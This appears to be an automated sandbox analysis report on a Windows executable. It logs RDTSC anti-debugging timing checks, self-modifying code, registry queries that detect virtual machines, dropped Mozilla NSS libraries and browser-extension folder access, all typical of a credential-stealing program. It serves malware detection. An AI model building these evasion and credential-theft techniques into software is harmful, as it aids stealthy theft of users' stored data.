Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EF97 second address: 79EF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6D3B second address: 7A6D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36ED361E06h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c jmp 00007F36ED361E0Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6D53 second address: 7A6D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F36EC8543CDh 0x0000000a jmp 00007F36EC8543CFh 0x0000000f popad 0x00000010 push eax 0x00000011 je 00007F36EC8543C8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jmp 00007F36EC8543D4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B93D1 second address: 7B93E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0BE5 second address: 7C0BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0BEB second address: 7C0BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0BEF second address: 7C0C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F36EC8543D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5380 second address: 7C538A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C538A second address: 7C53D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D1h 0x00000009 jmp 00007F36EC8543D8h 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push edi 0x00000016 jmp 00007F36EC8543D2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA44A second address: 7CA45B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA45B second address: 7CA460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EC90F second address: 6EC922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D121F second address: 7D1266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F36EC8543CCh 0x00000010 jmp 00007F36EC8543D1h 0x00000015 pop edi 0x00000016 push eax 0x00000017 jmp 00007F36EC8543D1h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFC28 second address: 7CFC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD77 second address: 7CFD7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD7B second address: 7CFD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD87 second address: 7CFDA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F36EC8543D0h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFF0E second address: 7CFF37 instructions: 0x00000000 rdtsc 0x00000002 js 00007F36ED361E06h 0x00000008 jmp 00007F36ED361E17h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F36ED361E06h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D01C5 second address: 7D0206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F36EC8543D4h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jnp 00007F36EC8543C8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F36EC8543D4h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jbe 00007F36EC8543C6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D04F3 second address: 7D04F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D04F7 second address: 7D04FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D04FD second address: 7D0503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D0503 second address: 7D051A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F36EC8543CEh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D051A second address: 7D0520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D6057 second address: 7D605F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0476 second address: 7E0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F36ED361E08h 0x00000014 push edx 0x00000015 jne 00007F36ED361E06h 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0494 second address: 7E04A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F36EC8543C6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3F15 second address: 7E3F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3F19 second address: 7E3F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3BB4 second address: 7F3BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3BBD second address: 7F3BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F36EC8543CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3BCA second address: 7F3BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F36ED361E0Fh 0x0000000f jns 00007F36ED361E06h 0x00000015 popad 0x00000016 jmp 00007F36ED361E11h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801E6F second address: 801E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805651 second address: 805655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805655 second address: 805659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8057E0 second address: 8057E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8057E4 second address: 80580E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D7h 0x00000007 jmp 00007F36EC8543CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B13 second address: 805B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B1C second address: 805B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B22 second address: 805B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805E3E second address: 805E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F36EC8543CFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805E54 second address: 805E5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F36ED361E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806190 second address: 806195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806195 second address: 8061A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F36ED361E06h 0x0000000a jno 00007F36ED361E06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8062C1 second address: 8062D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007F36EC8543C6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8062D1 second address: 8062F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F36ED361E0Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8062F4 second address: 806301 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80645B second address: 80645F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80645F second address: 80647E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36EC8543D7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80647E second address: 806482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806482 second address: 8064B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F36EC8543D4h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F36EC8543D2h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8064B5 second address: 8064BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8064BF second address: 8064CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F36EC8543C6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80932D second address: 809337 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C392 second address: 80C3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C3A9 second address: 80C3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F36ED361E06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C3BA second address: 80C3E8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36EC8543C6h 0x00000008 jmp 00007F36EC8543D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push edx 0x00000013 jng 00007F36EC8543C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DE05 second address: 80DE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE02FD second address: 4CE0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0302 second address: 4CE0308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0308 second address: 4CE0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F36EC8543D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0328 second address: 4CE032F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A8h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03DC second address: 4CE03F7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F36EC8543CCh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03F7 second address: 4CE03FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03FB second address: 4CE0401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0401 second address: 4CE0437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36ED361E12h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F36ED361E0Dh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ebx, 56095E4Eh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7320CF second address: 73210A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36EC8543CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F36EC8543CEh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F36EC8543D5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732478 second address: 73247E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73247E second address: 732495 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36EC8543C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F36EC8543C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C1B second address: 4CE0C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C35 second address: 4CE0C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36EC8543CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C47 second address: 4CE0C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e pushfd 0x0000000f jmp 00007F36ED361E15h 0x00000014 or eax, 1E014216h 0x0000001a jmp 00007F36ED361E11h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C84 second address: 4CE0CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 call 00007F36EC8543D3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36EC8543D2h 0x00000018 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 581B5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 57F4E6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 74B54A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7ADD29 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00334910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0032E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00333EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003216D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003338B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0032ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00334570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00321160 GetSystemInfo,ExitProcess,

0_2_00321160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
